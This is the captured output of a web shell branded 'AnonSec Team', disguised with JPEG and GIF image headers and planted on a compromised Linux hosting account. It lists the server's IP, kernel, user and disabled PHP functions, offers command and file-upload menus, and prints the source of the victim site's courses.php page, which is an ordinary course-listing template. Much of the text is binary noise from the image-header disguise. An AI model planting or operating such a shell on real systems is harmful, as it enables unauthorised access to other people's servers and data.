����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 3.144.41.127
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/admin/assets/../../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/admin/assets/../../courses.php
<?php
$page = 'courses';
include 'header.php';
?>
<link rel="canonical" href="https://vflyorions.com/courses"/>
<meta charset="UTF-8">
     <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta name="description" content="Explore our diverse range of courses designed to ignite your passion and expand your knowledge.
From cutting-edge technology to timeless, discover interests." />
    
    <meta name="keywords" content="BPO Service in nagpur, BPO voice and non voice, BPO voice In nagpur, BPO non voice in nagpur , BPO voice company in nagpur, BPO non-voice company in nagpur, BPO voice and non voice services, BPO outsorcing, B2B call Center" />
    <!-- ======== Page title ============ -->
    <title>Empower Your Growth: Choose Our Courses | vflyorions</title>
    

    <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/allbanner.png')">
        <div class="container">
            <div class="row">
                <div class="col-12 col-lg-12">
                    <div class="page-heading text-white">
                        <h1>Course</h1>
                    </div>
                    <div class="breadcrumb-wrap">
                        <nav>
                            <ol class="breadcrumb">
                              <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                              <li class="breadcrumb-item active" aria-current="page">Course</li>
                            </ol>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
    
    
   <section class="news-wrapper section-padding">
        <div class="container">
            <div class="row">
                <div class="col-lg-12 col-12 text-center">
                    <div class="block-contents">
                        <div class="section-title">
                            <h5>Courses</h5>
                            <span>Knowledge for Success Journey</span>
                            <h2>Our Courses</h2>
                        </div>
                    </div>
                </div>
            </div>

            <div class="row">
                <?php  
                $query='SELECT * FROM courses';
                $result= $conn->query($query);
                while($row=$result->fetch_assoc())
                {
                ?>
                <div class="col-xl-4 col-md-6 col-12">
                    <div class="single-blog-card style-1">
                        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('admin/assets/course_image/<?= $row['image']; ?>')"></div>
                        <div class="contents">
                            <div class="post-metabar d-flex justify-content-between align-items-center">
                                <div class="post-author">
                                   <!--<i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                                  <b style="color:#ff5e14;font-size: 20px;">₹</b> 
                                    <a href="coursedetails.php?id=<?= $row['id']; ?>" style="font-size:20px;color:#ff5e14;"><?= $row['price']; ?></a>
                                </div>
                                <div class="post-date">
                                   <i class="fa-solid fa-cart-shopping"></i>
                                    <a href="coursedetails.php?id=<?= $row['id']; ?>" style="color:#ff5e14">Buy Now</a>
                                </div>
                            </div>
                            <h4><a href="coursedetails.php?id=<?= $row['id']; ?>"><?= $row['heading']; ?></a></h4>
                            <p class="mb-4"><?= $row['short_description']; ?> </p>
                              <a href="coursedetails.php?id=<?= $row['id']; ?>" class="course-btn">Buy Now</a>
                        </div>
                    </div>
                </div>
                <?php
                }
                ?>
                <!--<div class="col-xl-4 col-md-6 col-12">-->
                <!--    <div class="single-blog-card style-1">-->
                <!--        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('assets/img/2.png')"></div>-->
                <!--        <div class="contents">-->
                <!--            <div class="post-metabar d-flex justify-content-between align-items-center">-->
                <!--                <div class="post-author">-->
                <!--                   <i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                <!--                    <a href="#" style="font-size:20px;color:#ff5e14;">₹ 300</a>-->
                <!--                </div>-->
                <!--                <div class="post-date">-->
                <!--                   <i class="fa-solid fa-cart-shopping"></i>-->
                <!--                    <a href="coursedetails.php" style="color:#ff5e14">Buy Now</a>-->
                <!--                </div>-->
                <!--            </div>-->
                <!--            <h4><a href="coursedetails.php">Web Development</a></h4>-->
                <!--            <p class="mb-4">Frontend development refers to the process of building the user interface (UI) ... </p>-->
                <!--              <a href="coursedetails.php" class="course-btn">Buy Now</a>-->
                <!--        </div>-->
                <!--    </div>-->
                <!--</div>-->
                <!-- <div class="col-xl-4 col-md-6 col-12">-->
                <!--    <div class="single-blog-card style-1">-->
                <!--        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('assets/img/3.png')"></div>-->
                <!--        <div class="contents">-->
                <!--            <div class="post-metabar d-flex justify-content-between align-items-center">-->
                <!--                <div class="post-author">-->
                <!--                   <i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                <!--                    <a href="#" style="font-size:20px;color:#ff5e14;">₹ 300</a>-->
                <!--                </div>-->
                <!--                <div class="post-date">-->
                <!--                   <i class="fa-solid fa-cart-shopping"></i>-->
                <!--                    <a href="coursedetails.php" style="color:#ff5e14">Buy Now</a>-->
                <!--                </div>-->
                <!--            </div>-->
                <!--            <h4><a href="coursedetails.php">Wordpress Development</a></h4>-->
                <!--            <p class="mb-4">Frontend development refers to the process of building the user interface (UI) ... </p>-->
                <!--              <a href="coursedetails.php" class="course-btn">Buy Now</a>-->
                <!--        </div>-->
                <!--    </div>-->
                <!--</div>-->
                <!--<div class="col-xl-4 col-md-6 col-12">-->
                <!--    <div class="single-blog-card style-1">-->
                <!--        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('assets/img/4.png')"></div>-->
                <!--        <div class="contents">-->
                <!--            <div class="post-metabar d-flex justify-content-between align-items-center">-->
                <!--                <div class="post-author">-->
                <!--                   <i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                <!--                    <a href="#" style="font-size:20px;color:#ff5e14;">₹ 300</a>-->
                <!--                </div>-->
                <!--                <div class="post-date">-->
                <!--                   <i class="fa-solid fa-cart-shopping"></i>-->
                <!--                    <a href="coursedetails.php" style="color:#ff5e14">Buy Now</a>-->
                <!--                </div>-->
                <!--            </div>-->
                <!--            <h4><a href="coursedetails.php">App Development</a></h4>-->
                <!--            <p class="mb-4">Frontend development refers to the process of building the user interface (UI) ... </p>-->
                <!--              <a href="coursedetails.php" class="course-btn">Buy Now</a>-->
                <!--        </div>-->
                <!--    </div>-->
                <!--</div>-->
                <!--<div class="col-xl-4 col-md-6 col-12">-->
                <!--    <div class="single-blog-card style-1">-->
                <!--        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('assets/img/5.png')"></div>-->
                <!--        <div class="contents">-->
                <!--            <div class="post-metabar d-flex justify-content-between align-items-center">-->
                <!--                <div class="post-author">-->
                <!--                   <i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                <!--                    <a href="#" style="font-size:20px;color:#ff5e14;">₹ 300</a>-->
                <!--                </div>-->
                <!--                <div class="post-date">-->
                <!--                   <i class="fa-solid fa-cart-shopping"></i>-->
                <!--                    <a href="coursedetails.php" style="color:#ff5e14">Buy Now</a>-->
                <!--                </div>-->
                <!--            </div>-->
                <!--            <h4><a href="coursedetails.php">Graphics & Logo</a></h4>-->
                <!--            <p class="mb-4">Frontend development refers to the process of building the user interface (UI) ... </p>-->
                <!--              <a href="coursedetails.php" class="course-btn">Buy Now</a>-->
                <!--        </div>-->
                <!--    </div>-->
                <!--</div>-->
                <!--<div class="col-xl-4 col-md-6 col-12">-->
                <!--    <div class="single-blog-card style-1">-->
                <!--        <div class="blog-featured-img bg-cover bg-center" style="background-image: url('assets/img/6.png')"></div>-->
                <!--        <div class="contents">-->
                <!--            <div class="post-metabar d-flex justify-content-between align-items-center">-->
                <!--                <div class="post-author">-->
                <!--                   <i class="fa-regular fa-money-bill-1" style="color:#ff5e14;"></i>-->
                <!--                    <a href="#" style="font-size:20px;color:#ff5e14;">₹ 300</a>-->
                <!--                </div>-->
                <!--                <div class="post-date">-->
                <!--                   <i class="fa-solid fa-cart-shopping"></i>-->
                <!--                    <a href="coursedetails.php" style="color:#ff5e14">Buy Now</a>-->
                <!--                </div>-->
                <!--            </div>-->
                <!--            <h4><a href="coursedetails.php">Digital Marketing</a></h4>-->
                <!--            <p class="mb-4">Frontend development refers to the process of building the user interface (UI) ... </p>-->
                <!--              <a href="coursedetails.php" class="course-btn">Buy Now</a>-->
                <!--        </div>-->
                <!--    </div>-->
                <!--</div>-->
            </div>
        </div>
    </section>
    
<?php
include 'footer.php';
?>

AnonSec - 2021